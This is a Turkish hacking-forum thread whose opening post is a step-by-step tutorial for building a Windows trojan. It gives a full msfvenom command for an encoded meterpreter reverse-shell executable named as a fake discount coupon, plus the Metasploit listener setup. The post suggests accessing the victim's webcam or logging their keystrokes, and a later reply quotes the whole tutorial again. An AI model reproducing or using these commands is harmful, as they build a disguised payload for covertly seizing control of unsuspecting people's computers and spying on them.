Kali linux trojan oluşturma ayrıntılı anlatım!! (çok basit)

TrBraveHeart

Yeni üye
15 Eyl 2018
21
1
Sakarya
Merhaba değerli "Türk Hack Team" ailesi bu yazımda sizlere ****sploit ten trojan oluşturmayı anlatacağım öncelikle githubtan ****sploiti uç birim sayesinde kurmalısınız sonrasında Port açmak lazım port açmakta biraz sıkıntı vardır ondan dolayı duck dns sayesinde port olayını çözmeliyiz

PORT:Kanal demektir port ile pc ile virüs arasındaki bağlantıdır port olmazsa bağlantı olmaz yaptığınız trojan sadece hedef pc de kalır.


Aşağıda verdiğim harfler ve anlamları önemlidir dikkatlice okuyunuz!

f = Kaydedilecek dosya formatı. msfvenom -f “çıktı formatı”

-a = Oluşturulacak payload’un mimarisini belirler. Msfvenom -a “mimari”

--platform = Dosyanın çalışacağı platformu belirler. msfvenom --platform “çalışacağı platform"

-o = Payload’un nereye çıkarılacağını belirtir. msfvenom -o “çıkarılacak dizi"

-e = Encoder seçimini belirtir. msfvenom -e “encoder adı”

-i = İterasyon sayısını belirler yani encoding işleminin kaç kere tekrarlanacağını bildirir. "msfvenom -i 20"

-b = Kötü karakterleri (bad characters) temizler. “msfvenom -b ‘\x00\xff’

-x = Oluşturulacak payload’un bir dosya ile birleştirileceğini belirtir. msfvenom -x “birleştirilecek dosyanın adı veya yolu

-k = Birleştirilen dosyanın fonksiyonlarının bozulmasını engelle “msfvenom -k

-c = Birleştirilecek Shell code’u belirler. msfvenom -c “Shell code dizini”


Şimdi eğer parametreleri öğrendiysek gelelim trojan oluşturmaya.



1-Konsolu açıyoruz.

2-Konsola msfvenom ile msfvenom parametrelerini kullanarak bir trojan oluşturuyoruz.Ben şimdilik şöyle bir trojan oluşturacağız.

###YAZILAN İP, PORT TEMSİLİDİR SİZ KENDİ BİLGİLERİNİZİ GİRECEKSİNİZ.###

##ÖRNEK##msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=443 -f exe -a x86 -o /root/Masaüstü/indirimkuponu.exe --platform windows -e x86/shikata_ga_nai -i 20--

&&Bu demek oluyorki dosyamızı “msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=443 -f exe -a x86 -o /root/Masaüstü/indirimkuponu.exe --platform windows -e x86/shikata_ga_nai -i 20” komutu ile oluşturduk. Buna göre 192.168.1.6 IP adresinin 443 portuna geri dönüş yapacak, x86 platformda çalışacak, shikata_ga_nai encoder’ını kullanan, 20 defa encoding işlemi yapan bir exe dosyası hazırlamış olduk. Yani 20 defa üst üste şifreledik.

Trojanı oluşturduk sıra geldi dinlemeye



Başka bir konsol açıp msfconsole komutunu yazarak ****sploit konsolunu çalıştırıyoruz. Ardından listen moda geçmek için aşağıdaki tabloda yer alan komutları sırası ile yazacağız.Komutları öğrenelim ilk önce

use exploit/multi/handler = Gelen bağlantıları dinleyecek handlerımızı belirtiyoruz.


set PAYLOAD windows/meterpreter/reverse_tcp = Bize ters bağlantı (reverse connection) kuracak olan payload’umuzu ayarlıyoruz.



set LHOST 192.168.126.141 = Gelen bağlantıları kabul edecek IP adresimizi belirtiyoruz.



set LPORT 443 = 443’üncü porta gelen bağlantıları dinleyeceğimizi ve bu bağlantıları kabul edeceğimizi belirtiyoruz.

Herşey olduktan sonra run komutu ile başlatıyoruz şimdi dinlemeye aldık dinlemede iken eğer birisi trojanı açarsa port sayesinde ekranımıza ipi si düşecektir gelen daveti kabul etmek için session komutunu kullanıyoruz bu sayede kabul etmiş oluyoruz bundan sonrası size kalmış ister gidin kamerasına girin ister klavye takibi yapın sizin tercihiniz

####ÖNEMLİ UYARI####

Yaptığınız faaliyetlerden başta Türk Hack Team yönetimi olmak üzere Şahsım dahil kimse sorumlu değildir.

##EĞER TAKILDIĞINIZ NOKTA OLURSA SORABİLİRSİNİZ##
 

RTFM

Üye
22 Nis 2019
174
8
Merhaba,

Öncelikle eline sağlık ama forum içerisin de bu konuyla ilgili yazılmış çok fazla yazı var ve görsel materyaller ile de zenginleştirebilirsin yazılarını hem daha açıklayıcı hem de daha güzel yazılarınız olur.
 

TrBraveHeart

Yeni üye
15 Eyl 2018
21
1
Sakarya
Haklısın çok yazı var şehir dışında tel ile yazdığım için pek birşey yapamadım ileride daha iyi konular olacak inşallah
 

xero1

Yeni üye
24 Ağu 2023
2
0
Merhaba değerli "Türk Hack Team" ailesi bu yazımda sizlere ****sploit ten trojan oluşturmayı anlatacağım öncelikle githubtan ****sploiti uç birim sayesinde kurmalısınız sonrasında Port açmak lazım port açmakta biraz sıkıntı vardır ondan dolayı duck dns sayesinde port olayını çözmeliyiz

PORT:Kanal demektir port ile pc ile virüs arasındaki bağlantıdır port olmazsa bağlantı olmaz yaptığınız trojan sadece hedef pc de kalır.


Aşağıda verdiğim harfler ve anlamları önemlidir dikkatlice okuyunuz!

f = Kaydedilecek dosya formatı. msfvenom -f çıktı formatı

-a = Oluşturulacak payloadun mimarisini belirler. Msfvenom -a mimari

--platform = Dosyanın çalışacağı platformu belirler. msfvenom --platform çalışacağı platform"

-o = Payloadun nereye çıkarılacağını belirtir. msfvenom -o çıkarılacak dizi"

-e = Encoder seçimini belirtir. msfvenom -e encoder adı

-i = İterasyon sayısını belirler yani encoding işleminin kaç kere tekrarlanacağını bildirir. "msfvenom -i 20"

-b = Kötü karakterleri (bad characters) temizler. msfvenom -b \x00\xff

-x = Oluşturulacak payloadun bir dosya ile birleştirileceğini belirtir. msfvenom -x birleştirilecek dosyanın adı veya yolu

-k = Birleştirilen dosyanın fonksiyonlarının bozulmasını engelle msfvenom -k

-c = Birleştirilecek Shell codeu belirler. msfvenom -c Shell code dizini


Şimdi eğer parametreleri öğrendiysek gelelim trojan oluşturmaya.



1-Konsolu açıyoruz.

2-Konsola msfvenom ile msfvenom parametrelerini kullanarak bir trojan oluşturuyoruz.Ben şimdilik şöyle bir trojan oluşturacağız.

###YAZILAN İP, PORT TEMSİLİDİR SİZ KENDİ BİLGİLERİNİZİ GİRECEKSİNİZ.###

##ÖRNEK##msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=443 -f exe -a x86 -o /root/Masaüstü/indirimkuponu.exe --platform windows -e x86/shikata_ga_nai -i 20--

&&Bu demek oluyorki dosyamızı msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=443 -f exe -a x86 -o /root/Masaüstü/indirimkuponu.exe --platform windows -e x86/shikata_ga_nai -i 20 komutu ile oluşturduk. Buna göre 192.168.1.6 IP adresinin 443 portuna geri dönüş yapacak, x86 platformda çalışacak, shikata_ga_nai encoderını kullanan, 20 defa encoding işlemi yapan bir exe dosyası hazırlamış olduk. Yani 20 defa üst üste şifreledik.

Trojanı oluşturduk sıra geldi dinlemeye



Başka bir konsol açıp msfconsole komutunu yazarak ****sploit konsolunu çalıştırıyoruz. Ardından listen moda geçmek için aşağıdaki tabloda yer alan komutları sırası ile yazacağız.Komutları öğrenelim ilk önce

use exploit/multi/handler = Gelen bağlantıları dinleyecek handlerımızı belirtiyoruz.


set PAYLOAD windows/meterpreter/reverse_tcp = Bize ters bağlantı (reverse connection) kuracak olan payloadumuzu ayarlıyoruz.



set LHOST 192.168.126.141 = Gelen bağlantıları kabul edecek IP adresimizi belirtiyoruz.



set LPORT 443 = 443üncü porta gelen bağlantıları dinleyeceğimizi ve bu bağlantıları kabul edeceğimizi belirtiyoruz.

Herşey olduktan sonra run komutu ile başlatıyoruz şimdi dinlemeye aldık dinlemede iken eğer birisi trojanı açarsa port sayesinde ekranımıza ipi si düşecektir gelen daveti kabul etmek için session komutunu kullanıyoruz bu sayede kabul etmiş oluyoruz bundan sonrası size kalmış ister gidin kamerasına girin ister klavye takibi yapın sizin tercihiniz

####ÖNEMLİ UYARI####

Yaptığınız faaliyetlerden başta Türk Hack Team yönetimi olmak üzere Şahsım dahil kimse sorumlu değildir.

##EĞER TAKILDIĞINIZ NOKTA OLURSA SORABİLİRSİNİZ##
kendi bilgisayar veya telefonumda denemek istiyorum, şu anda ana bilgisaayrım windows ve virtiul box üzerinden kaliye giriyorum ancak bunları kendimde denemek istiyorum ve birçok yol denedim https portuyla dinlemeyi falan açmıyor erişimi sağlayamıyor en son kaliden windowsa atip denim dedim ama kaliden windowsa dosya aktarımı yapamıyorum yaklaşık 2 senedir uğraşıyorum siber ile ama bu sorunlara çözüm bulamıyorum yardımcı olurmusunuz?
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.